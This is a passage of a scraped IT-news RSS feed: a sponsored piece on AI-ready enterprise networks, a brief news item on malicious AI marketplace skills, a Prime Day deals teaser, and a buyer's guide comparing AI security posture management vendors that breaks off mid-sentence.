<p>But there’s a problem. Many enterprise AI initiatives are struggling to move beyond pilots into production. Despite near-universal adoption, McKinsey finds that <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai" target="_blank" rel="sponsored">88% of organizations now use AI in at least one business function</a>, while almost two-thirds remain stuck in pilots and experimentation.  </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“When it comes to AI readiness, most organizations are still trying to figure it out,” says industry expert Bill Burns. “We’re all asking the same questions: where should workloads live, how will traffic move, what does security look like, and where are the bottlenecks going to appear?”</p>
</blockquote>



<p>The reasons are well documented, and most have nothing to do with infrastructure: unclear ROI, poor data quality, governance gaps, change-management fatigue, and a shortage of talent. Any honest account of why pilots stall has to start there.</p>



<p>But there is a common thread why these problems keep surfacing at the same companies, and it sits underneath all of them. Businesses can fix their data strategy, governance model, and talent pipeline, and still find that workloads won’t move where they need to, when they need to, at the cost they need. That constraint is the network – the one layer that gates whether the rest can actually run in production.</p>



<p><strong>Why AI traffic is different and legacy networks can’t cope</strong></p>



<p>Enterprise networks have always evolved to reflect changes in technology and working patterns. The rise of cloud computing and mobile devices in the mid-2000s, for example, shifted enterprise applications from the data center to public clouds and made the internet the network of choice.</p>



<p>AI is triggering the next major shift. It changes the shape, speed and economics of data movement, creating new traffic patterns that legacy infrastructure was never designed to handle. Unless networks adapt, AI will struggle to move beyond pilots into production.</p>



<p>The first challenge comes from training AI models. Unlike traditional enterprise traffic, AI workloads are persistent and continuous, creating demands that can overwhelm existing networks.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“The problem is that many of us are trying to modernize while still keeping the lights on,” says Burns. “It’s a pendulum every day between operational stability and preparing for what comes next.”</p>
</blockquote>



<p>Training AI models requires data centers with high bandwidth, ultra-low latency and near-zero packet loss. Networks previously handling 100Gb may now need 400Gb or even 800Gb capacity. In distributed GPU clusters, one delayed packet can stall synchronization across thousands of dollars of compute resources in real-time.</p>



<p><strong>The inference challenge</strong></p>



<p>The second challenge comes from inference, where users interact with AI systems and AI agents talk to each other. This shifts traffic from north-south flows to far greater volumes of east-west machine-to-machine traffic, potentially increasing network demands by as much as 100x.</p>



<p>Furthermore, AI agents operate far faster than humans, meaning millisecond-level delays can become critical bottlenecks. As devices are increasingly used by both people and agents, enterprise networks will need to operate at machine speed.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“The network is no longer a foster child in the AI era,” says Murali Krishnan, associate vice president and head of the strategic products group for the Americas at Tata Communications. “It is the fabric – the epicenter around which performance, ROI and experience will be measured. CIOs need to unlearn what they knew about networks of the past, because how you design and deploy the network has changed from the ground up.”</p>
</blockquote>



<p><strong>What AI-ready networks look like</strong></p>



<p>After the physical networks of the 1990s and the software-defined networks of the 2010s, we’re moving into the era of cognitive and contextual networks, fit for the unique requirements of AI. Static, best-effort infrastructure is giving way to networks that can observe, prioritize and adapt in real-time. We believe this new infrastructure must be built on three principles.</p>



<ol class="wp-block-list">
<li>Unlike today’s enterprise networks, AI-ready networks will be <strong>natively intelligent and autonomous, with deep observability built in as standard</strong>. In AI environments, one delayed flow can ripple across an entire workload.</li>
</ol>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“Most networks can move AI traffic. The difference is whether they understand it,” says Rajat Gopal, vice president, cloud networking and security solutions at Tata Communications. “That means application awareness – knowing which workload a flow serves – consistency you can measure in jitter, not just an uptime number, and sovereignty enforced in the path itself, so data is geofenced by default.”</p>
</blockquote>



<ul class="wp-block-list">
<li>Given enterprises’ hunger for data, IT leaders will need to architect their future networks with<strong> elasticity and scalability </strong>in mind – not just increased link capacity, but also more effective congestion domain boundaries and more controlled interconnect paths between clouds.</li>
</ul>



<ul class="wp-block-list">
<li>Because the old perimeter-based security model is defunct in an era of AI-powered threats, when data moves continuously across domains, <strong>security and control</strong> have to be embedded into routing logic, not bolted on.</li>
</ul>



<p>Those guiding principles start to map out a way for enterprises to prepare for AI at a foundational level. The network is becoming an active control plane for AI performance, cost and compliance. It also helps address some of the biggest headaches facing IT leaders currently, such as data sovereignty compliance (through visibility into data paths and metadata) and cost optimization (via lowering egress fees).</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“We didn’t set out with AI in mind,” says Thor Wallace, CIO at NETSCOUT. “But as it turns out, the decisions we made through our digital transformation have put us in a position where we’re ready for it. The biggest driver was ensuring we had pervasive visibility across the network.”</p>
</blockquote>



<p><strong>The time to act</strong></p>



<p>As AI agents spread, the network is becoming a critical – yet frequently overlooked – enabler of enterprise AI success.</p>



<p>The opportunity is significant. As Seth Goodman, CRO at Boost Payment Solutions, argues: “To view AI as primarily a cost saver is missing the point entirely.” The organizations seeing the greatest value are using AI to increase productivity, accelerate decision-making and unlock entirely new capabilities.</p>



<p>With industry leaders already benefiting from AI’s productivity gains, CIOs have no time to waste. Fixing the foundations should be the key first step for IT leaders looking to get ready for AI.</p>



<p><em>AI-powered enterprises are being built today. It’s time to get real about your AI readiness. <a href="https://url.usb.m.mimecastprotect.com/s/dWq5CqAE2EfmV7zQsZfkcEFECV?domain=tatacommunications.com" target="_blank" rel="sponsored">Discover how to evolve your network for the next era in Tata Communications latest whitepaper</a></em>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw AI Marketplace Malicious Skills]]></title>
<description><![CDATA[Palo Alto Networks’ Unit 42 research team has identified malicious AI skills distributed through ClawHub, an artificial intelligence marketplace, that successfully bypass automated security scanning systems. This article has been indexed from CyberMaterial Read the original article: OpenClaw AI M...]]></description>
<link>https://tsecurity.de/de/3621369/it-security-nachrichten/openclaw-ai-marketplace-malicious-skills/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621369/it-security-nachrichten/openclaw-ai-marketplace-malicious-skills/</guid>
<pubDate>Wed, 24 Jun 2026 14:38:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Palo Alto Networks’ Unit 42 research team has identified malicious AI skills distributed through ClawHub, an artificial intelligence marketplace, that successfully bypass automated security scanning systems. This article has been indexed from CyberMaterial Read the original article: OpenClaw AI Marketplace…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-ai-marketplace-malicious-skills/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-ai-marketplace-malicious-skills/">OpenClaw AI Marketplace Malicious Skills</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Our favorite Prime Day deals you can shop on day two]]></title>
<description><![CDATA[Welcome to day two of Amazon’s four-day Prime Day event, which, if we’re being honest, looks a lot like day one. That’s actually good news, though, because many of the best deals are still around, and some new ones have joined them. If you’ve got a Prime subscription, whether through a free trial...]]></description>
<link>https://tsecurity.de/de/3621064/it-nachrichten/our-favorite-prime-day-deals-you-can-shop-on-day-two/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621064/it-nachrichten/our-favorite-prime-day-deals-you-can-shop-on-day-two/</guid>
<pubDate>Wed, 24 Jun 2026 13:03:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Welcome to day two of Amazon’s four-day Prime Day event, which, if we’re being honest, looks a lot like day one. That’s actually good news, though, because many of the best deals are still around, and some new ones have joined them. If you’ve got a Prime subscription, whether through a free trial or a […]]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-SPM buyer’s guide: 14 tools to secure your AI infrastructure]]></title>
<description><![CDATA[Widespread enterprise adoption of AI has created a pressing need for security solutions — a tall order given that AI’s reach into organizational infrastructure and data is enormous and continues to grow.



Moreover, where an organization sits on the AI maturity curve impacts its security needs. ...]]></description>
<link>https://tsecurity.de/de/3620469/it-security-nachrichten/ai-spm-buyers-guide-14-tools-to-secure-your-ai-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620469/it-security-nachrichten/ai-spm-buyers-guide-14-tools-to-secure-your-ai-infrastructure/</guid>
<pubDate>Wed, 24 Jun 2026 09:09:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Widespread enterprise adoption of AI has created a pressing need for security solutions — a tall order given that AI’s reach into organizational infrastructure and data is enormous and continues to grow.</p>



<p>Moreover, where an organization sits on the AI maturity curve impacts its security needs. Trail of Bits CEO Dan Guide <a href="https://www.youtube.com/watch?v=kgwvAyF7qsA">describes the AI journey as a migration</a> from AI-assisted, where AI tools are used on existing workflows; through AI-augmented, which uses new workflows based on AI; to the AI-native organization, where AI “becomes a core participant in the delivery and operations of a business.”</p>



<p>Those three stages require very different approaches to securing AI. They also present challenges for AI security vendors, whose platforms must fit in multiple places in a corporate network and interact with a broad spectrum of applications — especially as agentic AI expands. As analyst <a href="https://www.linkedin.com/pulse/guide-ai-agent-governance-enterprise-david-linthicum-tkcve/">David Linthicum recently posted</a>, “the conversation now has to shift from model fascination to operational discipline. The question is how those agents should be governed once they begin touching workflows that affect customers, employees, suppliers, compliance, and revenue.” </p>



<p>Making matters worse is that the average enterprise manages 37 agents, with more than half running without security oversight or logging, according to <a href="https://www.microsoft.com/en-us/security/security-insider/emerging-trends/cyber-pulse-ai-security-report#Introduction">Microsoft’s 2026 Cyber Pulse report</a>, which also found that, while 80% of Fortune 500 companies use active AI agents, only 10% have a clear strategy for managing them.</p>



<p>That lack of strategy also opens the door for attackers to abuse corporate AI systems for malicious purposes, as the recent <a href="https://krebsonsecurity.com/2026/06/hackers-used-metas-ai-support-bot-to-seize-instagram-accounts/">exploit of Meta’s account recovery using chatbots</a> demonstrated.</p>



<p>The trick to securing AI systems is in understanding how much protection is needed and where it should be applied in the expanding AI universe. While one could rent a well-meaning AI agent called <a href="https://agentalent.ai/agents/fa682e11-52a6-4dc9-9ae8-63816d876cc9">Sentry for $7,400 per month</a> to automate the daily work of a SOC analyst, many organizations rolling out AI across their business would be best served by considering AI security posture management (AI-SPM) tools.</p>



<p>Over the past two years, this emerging field has matured, with many security vendors incorporating or acquiring SPM features as part of their general security product portfolio.</p>



<p>Some vendors, such as SentinelOne and Concentric, don’t specifically sell AI-SPM per se, but offer an SPM tool that is part of a larger package of AI security services. Others offer AI-SPM in conjunction with their other SPM tools or <a href="https://www.csoonline.com/article/573629/cnapp-buyers-guide-top-tools-compared.html">CNAPP security offerings</a>. Some vendors, such as Cyera and Palo Alto, offer multiple AI-SPM packaging alternatives with differing feature sets.</p>



<p>Choosing the right product requires careful examination of the roster of features and integrations each product offers to ensure that it doesn’t duplicate existing security tooling or worse, leave important coverage gaps.</p>



<p>Here we take a deeper look at the AI-SPM product category, with a breakdown of offerings from 14 of the leading vendors in this increasingly important security ecosystem.</p>



<h2 class="wp-block-heading">AI security posture management explained</h2>



<p><a href="https://www.cio.com/article/2503234/how-guardrails-allow-enterprises-to-deploy-safe-effective-ai.html">AI security posture management</a> is an evolving cybersecurity discipline focused on ensuring the integrity and security of AI and machine learning systems. AI-SPM encompasses strategies, tools, and techniques for monitoring, assessing, and enhancing the security of AI models, data, pipelines, applications, and services, even as threats to those entities continually evolve.</p>



<p>In the past, security posture management tools were designed for two situations: to protect general cloud operations against misconfigurations and abuse, which is the province of <a href="https://www.csoonline.com/article/657138/how-to-choose-the-best-cloud-security-posture-management-tools.html">cloud security posture management</a> tools; and to protect against data leakage or malware infections, which is the province of <a href="https://www.csoonline.com/article/2075321/top-12-data-security-posture-management-tools.html">data security posture management</a> tools. With the rise of AI and large language models (LLMs), a third SPM product category is needed to check AI cloud services and their SDKs (like <a href="https://www.csoonline.com/article/4181094/hugging-face-transformers-rce-flaw-enables-stealthy-compromise-via-ai-model-configs.html">Hugging Face Transformers</a> or Azure Open AI SDK) to prevent model abuses. This is because numerous studies have documented how AI training data can be the subject of an attack or how bad data can be injected into models to manipulate results, including creating malicious backdoors for attackers to use to enter your enterprise.</p>



<p>The latest reports about attacks on AI and AI abuse can help you better understand the scope of security challenges rapidly evolving today. MITRE continues to enhance its comprehensive database of adversary tactics — <a href="https://atlas.mitre.org/">Adversarial Threat Landscape for Artificial-Intelligence Systems (ATLAS)</a> — based on real-world attack observations. ATLAS currently spans 170 techniques and 57 case studies. <a href="https://airisk.mit.edu/">MIT researchers also maintain a growing database of more than 1,700 AI-related risks</a> that they have observed from various AI sources. Another great source of AI-related attack methods is from the Open Worldwide Application Security Project (OWASP), which maintains a <a href="https://genai.owasp.org/resource/owasp-top-10-for-llm-applications-2025/">Top 10 list of LLM exploits.</a> Security managers should examine them before choosing any AI-SPM product. They should also consult Richard Stiennon’s <a href="http://guardiansofthemachineage.com/">Guardians of the Machine Age</a>, the most comprehensive collection of general security vendors, listing more than 100 AI security vendors. The printed book offers a deeper dive into the specifics of these tools.</p>



<p>The AI-SPM vendor landscape is quickly evolving, as incumbent security vendors have made numerous acquisitions. Palo Alto Networks bought Protect.ai last year; Cato Networks acquired Aim.security; Orca acquired Opus for AI agentic security; SentinelOne acquired Prompt.Security; Varonis acquired a variety of companies, including Cyral, SlashNext, and <a href="http://alltrue.ai/">AllTrue.ai</a>; and Google acquired Wiz.</p>



<h2 class="wp-block-heading">Why enterprises need AI-SPM</h2>



<p>AI-SPMs have been designed to protect enterprise networks and applications from a range of threats to AI systems. Just like no modern business would assemble a network without an appropriate firewall, AI-SPMs “ensure that AI models stay explainable, fair, accountable, transparent and equitable,” Forrester analyst Andras Cser tells CSO. “Further good security hygiene dictates that AI infrastructure should not be allowed to be used as a steppingstone for hackers for lateral movement and data exfiltration, and should include policies to prevent and fix configuration drift.”</p>



<p>AI-SPM can also help organizations standardize on a series of AI policies, procedures, tools, and workflows that can boost their security. Guido’s talk — linked above — is chock full of suggestions on how Trail of Bits accomplished this.</p>



<h2 class="wp-block-heading">Major AI-SPM trends and product features</h2>



<p>All AI-SPM vendors make use of agentless configurations, accessing cloud-based models and leaving data on their existing platforms. This is both a security measure and to avoid moving the massive data repositories involved across the internet.</p>



<p>AI-SPM vendors also make use of AI-related mechanisms to classify and track these vast data collections and to protect them against potential abuse and attack. Many have integrated their AI-SPM solutions in one of three directions:</p>



<ul class="wp-block-list">
<li>Bolting AI-SPM onto their existing cloud or data SPM platforms with rules, compliance checking, best practices, and protection policies that bridge all three types of security postures.</li>



<li>Stitching AI-SPM into their general AI security product that can be used to formulate AI-specific policies and perform AI-based red team and penetration testing in an effort to protect AI pipelines and workloads and uncover ways that shared AI services and platforms could be compromised.</li>



<li>Incorporating AI-SPM to help identify sensitive data referenced by an AI model and to examine training data exposed to a third-party or external application.</li>
</ul>



<p>Some vendors, especially established security vendors such as CrowdStrike, Proofpoint, Palo Alto, Varonis, and Wiz, have hundreds of third-party integrations that cover the AI waterfront (such as AI assistants and model suppliers) and general IT security arena (such as development pipelines, data feeds, and tools such as SOAR and SIEM). All three types of integrations can provide better guiderails and limit an AI’s blast radius.</p>



<p>But AI-SPM is still evolving. Some vendors’ tools just perform a top-level inspection of one or two services from each of the big three cloud platforms’ AI services (Amazon, for example, has dozens of AI-related service offerings), whereas others (such as Palo Alto Networks, Cato, Cyera, Varonis, and Wiz) take a deeper dive, performing a more comprehensive examination of AI data from the AI vendors themselves and other model sources.</p>



<p>There are two open source efforts as well: <a href="https://orca.security/resources/blog/orca-ai-goat-open-source-environment-owasp-risks/">Orca’s GOAT</a> is a free learning platform that is based on the OWASP top 10 risks. Palo Alto’s Protect.ai has its collection of <a href="https://github.com/protectai">open-source tools on GitHub</a> for scanning models and discovering AI interactions and automated red teaming called ProtectAI OSS. However, neither of these projects has been recently updated.</p>



<h2 class="wp-block-heading">How to choose an AI-SPM tool</h2>



<p>Here are several considerations when deciding on the best AI-SPM tool for your enterprise: </p>



<ol class="wp-block-list">
<li><strong>Does the vendor work with your existing security tool collection?</strong> This has two dimensions: integrating with other SPM products (such as data or cloud protection), and integrating with third-party tools such as SOARs, SIEMs, or DLP products. We have included some vendors that don’t have a specific AI-related SPM (such as Concentric and CrowdStrike) but have deeply embedded AI protection into their platforms.</li>



<li><strong>How deep is the coverage across the cloud platform providers?</strong> The big three (AWS, Azure, and GCP) have many services that touch various aspects of AI, and some products only work with a few of them, or only connect with PaaS security “hubs.”</li>



<li><strong>Does the vendor continuously scan your infrastructure looking for vulnerabilities?</strong> AI can be quickly adopted and is very dynamic, so discrete scans are less useful.</li>



<li><strong>How important is having a tool that can help with <a href="https://url.usb.m.mimecastprotect.com/s/9zsRCB1MnMHEEY8nHNiwc2W8AV?domain=csoonline.com">AI red teaming</a>?</strong> Understanding the dynamic nature of how AI operates means having a different approach to penetration testing, and this can be a very useful feature. Only a few vendors offer this feature (such as Concentric, Palo Alto Networks, and Varonis).</li>
</ol>



<h2 class="wp-block-heading">Leading AI-SPM vendors and products</h2>



<p>We reached out to a range of leading AI-SPM security vendors to demonstrate their AI-related tools. Below are more details about each of the 14 we had the opportunity to preview. We have also summarized each vendor’s offerings in the features table, which also provides links, when available, to pricing and third-party integration details. Several vendors didn’t respond to our inquiries, including Baffle.io, Invicti, SecurityCompass, Tonic Security, and Zscaler.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Vendor</strong></td><td><strong>Product/URL</strong></td><td><strong>Entry-level pricing</strong></td><td><strong>Packaging</strong></td><td><strong>Integrations link</strong></td><td><strong>App runtime security</strong></td><td><strong>Continuous scanning?</strong></td><td><strong>MCP/Agent protection?</strong></td><td><strong>AI Red Teaming?</strong></td></tr><tr><td>Arthur.ai</td><td><a href="https://www.arthur.ai/platform">Arthur Platform</a></td><td><a href="https://www.arthur.ai/pricing">Free and paid versions</a></td><td>Single product</td><td><a href="https://www.arthur.ai/any-ai-any-use-case">Deep PaaS coverage</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr><tr><td>Cato Networks</td><td><a href="https://www.catonetworks.com/platform/ai-security-for-end-users/">AI Security for End Users</a></td><td></td><td>SASE platform</td><td><a href="https://support.catonetworks.com/hc/en-us/articles/13975273800733-Cato-Data-Third-Party-Supported-Integrations">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr><tr><td>Concentric</td><td>No specific AI-SPM product</td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-nxjxmrwq7bkea?nc2=type_a_top_search">AWS $50,000/yr, varies</a></td><td><a href="https://concentric.ai/product-overview/">Part of its DSPM platform</a></td><td><a href="https://concentric.ai/integrations/">Numerous</a></td><td>No</td><td>Yes</td><td>No</td><td>Yes</td></tr><tr><td>CrowdStrike</td><td>No specific AI-SPM product</td><td></td><td><a href="https://www.crowdstrike.com/en-us/platform/cloud-security/ai-spm/">Part of Falcon AI platform</a></td><td><a href="https://marketplace.crowdstrike.com/">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td><a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-launches-ai-red-team-services-secure-ai-systems/">Separate service</a></td></tr><tr><td>Cyera</td><td><a href="https://www.cyera.com/platform/ai-guardian">AI Guardian</a></td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-mc6f4tbu6otj4?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS $50,000/yr</a></td><td>Sold in two bundles, see description</td><td><a href="https://www.cyera.com/integrations">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr><tr><td>Guardrail Technologies</td><td><a href="https://guardrail.tech/ai-traffic-light/">Traffic Light for Code and AI</a></td><td><a href="https://guardrail.tech/pricing/">Free and monthly plans</a></td><td>Also sell AI Command Center</td><td>Some</td><td>Yes</td><td>Yes</td><td>No</td><td>No</td></tr><tr><td>Microsoft</td><td><a href="https://www.microsoft.com/en-us/security/business/microsoft-purview">Purview</a></td><td>$12.60/user/mo</td><td>Part of larger CSPM platform</td><td>Some</td><td>Yes</td><td>No</td><td>Yes</td><td>No</td></tr><tr><td>OneTrust</td><td><a href="https://www.onetrust.com/solutions/ai-governance/">AI Governance</a></td><td>Subscriptions</td><td>Single product with SPM features</td><td>Some</td><td>Yes</td><td>Yes</td><td>No</td><td>No</td></tr><tr><td>Orca Security</td><td><a href="https://orca.security/platform/ai-security-posture-management/">AI-SPM</a></td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-rogbt2k4b63xc?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS $84,000/yr</a></td><td>Has other AI security tools</td><td><a href="https://orca.security/integrations/">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr><tr><td>Palo Alto Networks</td><td><a href="https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security">Prisma AI Security</a></td><td></td><td>Sold in two bundles, see description</td><td><a href="https://docs.prismacloud.io/en/enterprise-edition/content-collections/administration/configure-external-integrations-on-prisma-cloud/integrations-feature-support">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>Yes</td></tr><tr><td>Proofpoint</td><td><a href="https://www.proofpoint.com/us/products/ai-access-security">AI Access Security</a></td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-dcj7rctb55qie?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS $96,000/yr</a></td><td>People Protection Platform</td><td>Numerous</td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr><tr><td>SentinelOne</td><td>No specific AI SPM product</td><td><a href="https://www.sentinelone.com/platform-packages/">$80/yr/endpoint</a></td><td><a href="https://www.sentinelone.com/platform/securing-ai/">Part of larger Singularity platform</a></td><td><a href="https://www.sentinelone.com/partners/singularity-marketplace/">Numerous</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>Yes</td></tr><tr><td>Varonis</td><td><a href="https://www.varonis.com/platform/ai-security">Atlas</a></td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-eoyer6g2olf6k?sr=0-3&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS $108,000/yr</a></td><td>Bundled with AI Inventory</td><td><a href="https://varonis.com/coverage">Hundreds</a></td><td>Yes</td><td>Yes</td><td>Yes</td><td>Yes</td></tr><tr><td>Wiz/Google</td><td><a href="https://www.wiz.io/blog/introducing-wiz-ai-app">AI App Protection Platform</a></td><td><a href="https://aws.amazon.com/marketplace/pp/prodview-ibgbkrqusncsm?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS $38,000/yr</a></td><td>Variety of bundles available</td><td>Numerous</td><td>Yes</td><td>Yes</td><td>Yes</td><td>No</td></tr></tbody></table> </div></figure>



<h3 class="wp-block-heading">Arthur.ai</h3>



<p><a href="https://url.usb.m.mimecastprotect.com/s/FchtCzq8n8HJJ54rf4fVc9Ae_i?domain=arthur.ai/">Arthur.ai’s</a> platform is a single product that offers deep PaaS coverage with both AWS and Google Cloud Platform, although unlike other AI-SPMs it doesn’t offer a wide range of third-party integrations. It includes application runtime security protection. It also scans network traffic continuously and watches for agent activity, along with policy guardrails to protect against prompt injection and sensitive data leakage. It includes behavioral analytics and governance that catch abusive agentic activities. There are <a href="https://url.usb.m.mimecastprotect.com/s/yx7UCA8LmLh77kERH8hOcGedvn?domain=arthur.ai">free and paid versions</a> starting at $10,000 annual plans for smaller networks.</p>



<h3 class="wp-block-heading">Cato Networks AI Security for End Users</h3>



<p><a href="https://www.catonetworks.com/platform/ai-security-for-end-users/">Cato Networks AI Security for End Users</a> is one of three separate AI security packages that work together with Cato’s SASE platform, the other two being protection for applications (both runtime and across the software development lifecycle) and for real-time agentic operations. The three AI packages are meant to be purchased together to provide audit trails showing what users are doing with their AI tools and to help understand and illustrate the risks. Cato’s tools can also prevent prompt injection and data leaks and find compliance blind spots. Its platform has a <a href="https://support.catonetworks.com/hc/en-us/articles/13975273800733-Cato-Data-Third-Party-Supported-Integrations">wide collection of third-party integrations</a>, including CrowdStrike, Microsoft, and Splunk SIEMs, and various data sources such as Google’s Chronicle and Rapid7. Cato Networks did not reveal pricing.</p>



<h3 class="wp-block-heading">Concentric AI and Data Security Governance</h3>



<p>Concentric sells a <a href="https://concentric.ai/product-overview/">DSPM platform</a> labelled “AI and Data Security Governance.” There is no specific AI tool, although AI pervades its product in a variety of places, including scanning various models for prompt injection, automated remediation, and the discovery and classification of data flows. It offers a <a href="https://concentric.ai/integrations/">wide collection of third-party integrations.</a> On the <a href="https://aws.amazon.com/marketplace/pp/prodview-nxjxmrwq7bkea?nc2=type_a_top_search">AWS Marketplace</a>, it sells an entry-level version for $50,000 per year that covers up to 25TB of data, with higher fees for larger data collections.</p>



<h3 class="wp-block-heading">CrowdStrike Falcon AI-SPM</h3>



<p><a href="https://www.crowdstrike.com/en-us/platform/cloud-security/ai-spm/">CrowdStrike Falcon AI-SPM</a> is not a separate product, but part of the overall Falcon Cloud security platform. It can correlate risk findings with other security services monitored by the full Falcon platform. It includes discovery of AI services and models across a variety of cloud platforms, including containers and virtual images, and can detect misconfigurations and dependencies with other software. It scans OpenAI, Amazon Bedrock, Amazon SageMaker, and Vertex AI models. <a href="https://marketplace.crowdstrike.com/">Falcon has more than 250 integrations</a> available to a wide collection of third-party security tools. You can request a free 15-day trial, but no further pricing information was disclosed.</p>



<h3 class="wp-block-heading">Cyera AI Guardian</h3>



<p>Cyera.io specializes in data file level classification. It packages its AI-SPM product in two separate bundles: either with its flagship <a href="https://www.cyera.io/platform/dspm">DSPM product</a> that has added what you might think of as AI-enriched data link protection as part of the default product’s features, or with a more complete set of security features called <a href="https://www.cyera.com/platform/ai-guardian">AI Guardian</a>. Cyera also offers a specialized add-on module used for Microsoft Copilot data scanning that can detect data used by insiders, for example. <a href="https://aws.amazon.com/marketplace/pp/prodview-mc6f4tbu6otj4?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa%20%5D">Cyera’s AWS Marketplace pricing can be found here</a> and starts at $50,000 per year. </p>



<h3 class="wp-block-heading">Guardrail Technologies Traffic Light for Code and AI</h3>



<p><a href="https://guardrail.tech/ai-traffic-light/">Guardrail Technologies Traffic Light for Code and AI</a> is designed to be a simple way to flag potential AI abuse by scanning AI-generated code and returning a red/yellow/green result to indicate potential for compromise. There is no remediation, but the tool integrates across the major AI vendors, including Anthropic, Azure Open AI, Hugging Face, and AWS Bedrock, and general security tools such as Wiz and Snyk. Guardrail has a custom AI security consulting business as well called AI Guardian. Very transparent pricing page and a 60-day free trial is available.</p>



<h3 class="wp-block-heading">Microsoft Purview</h3>



<p>Microsoft has bundled its various security posture tools into its <a href="https://www.microsoft.com/en-us/security/business/microsoft-purview">Purview offering</a>, which includes a series of AI-based Copilot apps, data SPM and classification tools, and data loss prevention extensions tuned to its various SaaS platforms such as 365, Azure, and Windows endpoints. This extends the AI security features that were originally part of its Defender for Cloud offerings. It has a limited number of third-party integrations. One-month free trials are available, and the entire suite is available for $12.60 per month per user. Microsoft has stepped up its involvement with AI with its Scout, a collection of autonomous AI agents built on top of OpenClaw. It is designed to work with its applications, using built-in security and privacy controls.</p>



<h3 class="wp-block-heading">OneTrust AI Governance</h3>



<p><a href="https://www.onetrust.com/solutions/ai-governance/">OneTrust offers AI Governance</a>, a platform that automates compliance and provides continuous monitoring of the AI landscape, across the software lifecycle starting with any AI usage at the beginning of any build. It can detect policy violations, and which AI agents are running. It offers a series of third-party integrations such as Amazon’s Bedrock and Sagemaker; Azure Foundry, ML Studio, and OpenAI; Databricks Unity Catalog and ML flow; and Google Vertex. Its subscription price is based on the number of admin users and number of AI inventory records, although no specifics were provided.</p>



<h3 class="wp-block-heading">Orca AI-SPM</h3>



<p><a href="https://orca.security/platform/ai-security/ai-spm/">Orca Security’s AI-SPM </a>is tightly integrated into the company’s security platform. It continues to expand its features, offering detections of more than 50 AI models, including training data and runtime threats, remediation, and support for Model Context Protocol to connect to other Orca-based telemetry. It <a href="https://orca.security/integrations/">continues to expand its nearly 100 integrations</a> across SIEM and SOAR systems and various cloud providers’ services. For example, it works with AWS S3, SQS, SNS, CodeBuild, CloudTrail, and Security Hub. It comes with dozens of best-practice security rules that initially focused on compliance. It also alerts when sensitive data is detected inside models and when secrets are exposed. Orca’s overall security platform shows an <a href="https://aws.amazon.com/marketplace/pp/prodview-rogbt2k4b63xc?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS Marketplace annual pricing that ranges from $84,000 to $360,000</a>, depending on the number of workloads scanned.</p>



<h3 class="wp-block-heading">Palo Alto Networks AIRS AI Security</h3>



<p>Palo Alto Networks has been busy acquiring point security vendors (Dig, ProtectAI, and an offer on Portkey) and incorporating their code into its two major product lines, Prisma and Cortex. You can purchase AI-SPM functionality in either Palo Alto product line, but they cover different aspects of the AI ecosystem. Cortex offers AI-SPM alongside the data and cloud SPMs integrated into the CNAPP suite. Prisma offers AI-SPM as part of a total AI security package called <a href="https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security">AIRS AI Security</a>, which includes runtime protection, model scanning, and a more comprehensive platform. We focus on AIRS AI, which supports top-level scans of Amazon, Google Cloud, and Azure AI services to discover AI content and can classify and examine model data and secrets and comes with many built-in AI-related policies. Prisma has a <a href="https://docs.prismacloud.io/en/enterprise-edition/content-collections/administration/configure-external-integrations-on-prisma-cloud/integrations-feature-support">long list of third-party integrations</a>, including significant depth in AWS security services. That link will also take you to detailed instructions on how to set up these integrations. To complicate matters further, Palo Alto also sells a <a 